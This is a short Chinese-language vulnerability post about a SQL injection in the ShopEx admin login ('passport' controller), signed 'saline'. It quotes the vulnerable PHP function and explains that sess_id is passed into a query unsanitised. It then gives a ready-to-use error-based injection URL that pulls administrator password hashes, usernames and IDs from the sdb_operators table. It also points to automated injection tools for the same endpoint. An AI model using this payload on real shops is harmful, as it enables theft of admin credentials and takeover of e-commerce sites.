最近在搞shopex的二次开发的时候发现的。跟踪后台登陆验证流程

shopexcoreadmincontrollerctl.passport.php中

function certi_validate(){        $cert = $this->system->loadModel('service/certificate');        $sess_id = $_POST['session_id'];         $return = array();        if($sess_id == $cert->get_sess()){            $return = array(                'res' => 'succ',                'msg' => '',                'info' => ''            );             echo json_encode($return);        }else{            $return = array(                'res' => 'fail',                'msg' => '000001',                'info' => 'You have the different session!'            );             echo json_encode($return);        }    }

在参数sess_id传递的时候没有做任何的处理,直接带入查询了。导致注入的产生。
exp:

http://www.xxxx.com/shopadmin/index.php?ctl=passport&act=login&sess_id=1'+and(select+1+from(select+count(*),concat((select+(select+(select+concat(userpass,0x7e,username,0x7e,op_id)+from+sdb_operators+Order+by+username+limit+0,1)+)+from+`information_schema`.tables+limit+0,1),floor(rand(0)*2))x+from+`information_schema`.tables+group+by+x)a)+and+'1'='1

对于不能爆出来的可以使用工具跑注入点

http://www.xxx.com/shopadmin/index.php?ctl=passport&act=login&sess_id=1

作者:saline